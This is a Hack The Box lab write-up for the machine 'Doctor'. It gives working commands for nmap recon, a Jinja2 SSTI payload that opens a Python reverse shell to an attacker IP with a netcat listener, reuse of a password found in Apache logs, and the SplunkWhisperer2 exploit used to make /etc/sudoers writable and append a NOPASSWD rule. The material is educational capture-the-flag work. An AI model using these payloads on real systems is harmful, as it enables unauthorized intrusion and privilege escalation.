HTB: Doctor

Details

This machine if Doctor from Hack The Box

Recon

kali@kali:~$ nmap -sV -p- 10.10.10.209
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-07 08:48 EST
Nmap scan report for 10.10.10.209
Host is up (0.013s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
8089/tcp open  ssl/http Splunkd httpd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 156.73 seconds

User

I started with http://10.10.10.209/

Screenshot 1

Port 8089 was running the splunk api, the default creds didn't work

kali@kali:~$ curl -k -u admin:changeme https://10.10.10.209:8089/services/messages
<?xml version="1.0" encoding="UTF-8"?>
<response>
  <messages>
    <msg type="ERROR">Unauthorized</msg>
  </messages>
</response>

From the email on the site I got the domain doctor.htb so I added it to hosts and visited

Screenshot 2

I clicked the register button

Screenshot 3

I then tried to sign up as "admin" and got the following message

Screenshot 4

So I can get if a username exists or not. I then signed up as "jirbj"

Screenshot 5

I can make posts, and wappalyzer told me that this was running flask

Screenshot 6

I tested with just test:test

Screenshot 7

So I made a post with the following title and content to test for template injections

title: {{ 7 * 7 }}
content: {{ 8 * 8 }}

This didn't work

Screenshot 8

So I ran a dirbust

Screenshot 9

And went to the archive page, it was blank. But I checked the source

Screenshot 10

49 is the result of 7*7, so I did have SSTI, just not on the page I originally expected. So I used payloads all the things to build the following payload

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.21\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\"]);'").read().zfill(417)}}{%endif%}{% endfor %}

Which I set as a page title, then set a listener

kali@kali:~$ nc -nvlp 4444

When I went back to /archive

connect to [10.10.14.21] from (UNKNOWN) [10.10.10.209] 38306
python3 -c "import pty;pty.spawn('/bin/bash')"
web@doctor:~$

web@doctor:~$ id
id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)

I had a shell. In the apache logs I found a file called backup

web@doctor:/var/log/apache2$ ls -la
ls -la
total 144624
drwxr-x---  2 root adm         4096 Nov  7 14:53 .
drwxrwxr-x 13 root syslog      4096 Nov  7 14:53 ..
-rw-r-----  1 root adm    129166899 Nov  7 16:28 access.log
-rw-r-----  1 root adm         6626 Sep 28 15:02 access.log.1
-rw-r-----  1 root adm          323 Aug 21 13:00 access.log.10.gz
-rw-r-----  1 root adm          270 Aug 18 12:48 access.log.11.gz
-rw-r--r--  1 root root     2194472 Jul 27 20:49 access.log.12.gz
-rw-r-----  1 root adm         1493 Sep 23 15:20 access.log.2.gz
-rw-r-----  1 root adm         3951 Sep 22 12:58 access.log.3.gz
-rw-r-----  1 root adm         1341 Sep 19 19:17 access.log.4.gz
-rw-r-----  1 root adm       664054 Sep 15 14:27 access.log.5.gz
-rw-r-----  1 root adm          384 Sep 14 10:07 access.log.6.gz
-rw-r-----  1 root adm         3018 Sep  7 17:24 access.log.7.gz
-rw-r-----  1 root adm         1338 Sep  6 22:46 access.log.8.gz
-rw-r-----  1 root adm         1266 Sep  5 11:58 access.log.9.gz
-rw-r-----  1 root adm        21578 Sep 17 16:23 backup
-rw-r-----  1 root adm     15919746 Nov  7 15:37 error.log
-rw-r-----  1 root adm         3551 Sep 28 15:07 error.log.1
-rw-r-----  1 root adm          476 Sep  7 17:46 error.log.10.gz
-rw-r-----  1 root adm          537 Sep  6 22:47 error.log.11.gz
-rw-r-----  1 root adm          680 Sep  5 11:58 error.log.12.gz
-rw-r-----  1 root adm          341 Sep  5 00:00 error.log.13.gz
-rw-r-----  1 root adm          230 Aug 21 13:07 error.log.14.gz
-rw-r-----  1 root adm         1092 Sep 23 15:42 error.log.2.gz
-rw-r-----  1 root adm          846 Sep 22 13:03 error.log.3.gz
-rw-r-----  1 root adm          655 Sep 22 10:40 error.log.4.gz
-rw-r-----  1 root adm          352 Sep 19 00:00 error.log.5.gz
-rw-r-----  1 root adm          424 Sep 18 00:00 error.log.6.gz
-rw-r-----  1 root adm          428 Sep 17 00:00 error.log.7.gz
-rw-r-----  1 root adm          629 Sep 16 00:00 error.log.8.gz
-rw-r-----  1 root adm          460 Sep 15 00:00 error.log.9.gz
-rw-r--r--  1 root root           0 Jul 27 17:10 other_vhosts_access.log

Inside it

web@doctor:/var/log/apache2$ cat backup
cat backup
[SNIP]
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
10.10.14.4 - - [05/Sep/2020:11:17:25 +0200] "GET /login HTTP/1.1" 200 1888 "http://doctor.htb/register" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
10.10.14.4 - - [05/Sep/2020:11:17:34 +0200] "POST /login HTTP/1.1" 302 732 "http://doctor.htb/login" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
10.10.14.4 - - [05/Sep/2020:11:17:34 +0200] "GET /home HTTP/1.1" 200 1648 "http://doctor.htb/login" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
10.10.14.4 - - [05/Sep/2020:11:17:38 +0200] "GET /post/new HTTP/1.1" 200 1619 "http://doctor.htb/home" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
[SNIP]

Guitar123 doesn't look like an email. So I assumed it could be a password instead. I found a username in /etc/passwd

web@doctor:/var/log/apache2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:122:127::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:128:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:124:65534::/run/gnome-initial-setup/:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
web:x:1001:1001:,,,:/home/web:/bin/bash
_rpc:x:126:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:127:65534::/var/lib/nfs:/usr/sbin/nologin
exim:x:31:31:Exim Daemon:/dev/null:/bin/false
sshd:x:128:65534::/run/sshd:/usr/sbin/nologin
shaun:x:1002:1002:shaun,,,:/home/shaun:/bin/bash
splunk:x:1003:1003:Splunk Server:/opt/splunkforwarder:/bin/bash

So I tried to su to shaun

web@doctor:/var/log/apache2$ su shaun
su shaun
Password: Guitar123

shaun@doctor:/var/log/apache2$

It worked, so I grabbed user

shaun@doctor:~$ ls -la
ls -la
total 44
drwxr-xr-x 6 shaun shaun 4096 Sep 15 12:51 .
drwxr-xr-x 4 root  root  4096 Sep 19 16:54 ..
lrwxrwxrwx 1 root  root     9 Sep  7 14:31 .bash_history -> /dev/null
-rw-r--r-- 1 shaun shaun  220 Sep  6 16:26 .bash_logout
-rw-r--r-- 1 shaun shaun 3771 Sep  6 16:26 .bashrc
drwxr-xr-x 4 shaun shaun 4096 Sep 22 13:00 .cache
drwx------ 4 shaun shaun 4096 Sep 15 11:14 .config
drwx------ 4 shaun shaun 4096 Sep 15 11:57 .gnupg
drwxrwxr-x 3 shaun shaun 4096 Sep  6 18:01 .local
-rw-r--r-- 1 shaun shaun  807 Sep  6 16:26 .profile
-rw-rw-r-- 1 shaun shaun   66 Sep 15 12:51 .selected_editor
-r-------- 1 shaun shaun   33 Nov  7 15:00 user.txt

shaun@doctor:~$ cat user.txt
[REDACTED]

Root

I tested shaun's creds on splunk

kali@kali:~$ curl -k -u shaun:Guitar123 https://10.10.10.209:8089/services/messages
<?xml version="1.0" encoding="UTF-8"?>
<!--This is to override browser formatting; see server.conf[httpServer] to disable. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-->
<?xml-stylesheet type="text/xml" href="/static/atom.xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:s="http://dev.splunk.com/ns/rest" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/">
  <title>messages</title>
  <id>https://10.10.10.209:8089/services/messages</id>
  <updated>2020-11-07T16:39:16+01:00</updated>
  <generator build="a1a6394cc5ae" version="8.0.5"/>
  <author>
    <name>Splunk</name>
  </author>
  <link href="/services/messages/_new" rel="create"/>
  <opensearch:totalResults>0</opensearch:totalResults>
  <opensearch:itemsPerPage>30</opensearch:itemsPerPage>
  <opensearch:startIndex>0</opensearch:startIndex>
  <s:messages/>
</feed>

And then found the following exploit for splunk https://github.com/cnotin/SplunkWhisperer2/blob/master/PySplunkWhisperer2/PySplunkWhisperer2_remote.py

And set a listener

kali@kali:~$ nc -nlvp 5555

The target machine didn't have -e as an option on nc, as I already had a shell I decided to just use the exploit to make sudoers writable

kali@kali:~$ sudo python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.21 --lport 6666 --username shaun --password Guitar123 --payload 'chmod 777 /etc/sudoers'
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmphtmvb4m3.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.21:6666/
10.10.10.209 - - [07/Nov/2020 10:42:02] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup

And checked the result

shaun@doctor:/etc$ ls -la
ls -la
[SNIP]
-rwxrwxrwx   1 root root     734 Sep  7 12:53 sudoers
[SNIP]

I made myself a sudoer

shaun@doctor:/etc$ echo 'shaun ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers

web@doctor:/etc$ cat /etc/sudoers
cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root    ALL=(ALL:ALL) ALL

# Members of the admin group may gain root privileges

# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d
shaun ALL=(ALL) NOPASSWD: ALL

And fixed the file permissions

kali@kali@~$ sudo python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.21 --lport 6666 --username shaun --password Guitar123 --payload 'chmod 440 /etc/sudoers'
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmps4q8yz3l.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.21:6666/
10.10.10.209 - - [07/Nov/2020 10:47:34] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup

I then verified it worked

shaun@doctor:/etc$ sudo -l
sudo -l
Matching Defaults entries for shaun on doctor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shaun may run the following commands on doctor:
    (ALL) NOPASSWD: ALL

And made myself root

shaun@doctor:/etc$ sudo su
sudo su

root@doctor:/etc# cd /root
cd /root

root@doctor:~# ls -la
ls -la
total 44
drwx------  7 root root 4096 Sep 22 12:02 .
drwxr-xr-x 20 root root 4096 Sep 15 12:51 ..
lrwxrwxrwx  1 root root    9 Jul 26 14:25 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dez  5  2019 .bashrc
drwx------  3 root root 4096 Aug 18 12:55 .cache
drwx------  4 root root 4096 Jul 27 20:32 .config
drwx------  3 root root 4096 Jul 27 20:32 .dbus
drwx------  3 root root 4096 Sep  6 17:09 .gnupg
drwxr-xr-x  3 root root 4096 Jul 21 19:17 .local
-rw-r--r--  1 root root  161 Dez  5  2019 .profile
-r--------  1 root root   33 Nov  7 15:00 root.txt
-rw-r--r--  1 root root   66 Sep 22 12:02 .selected_editor

root@doctor:~# cat root.txt
cat root.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.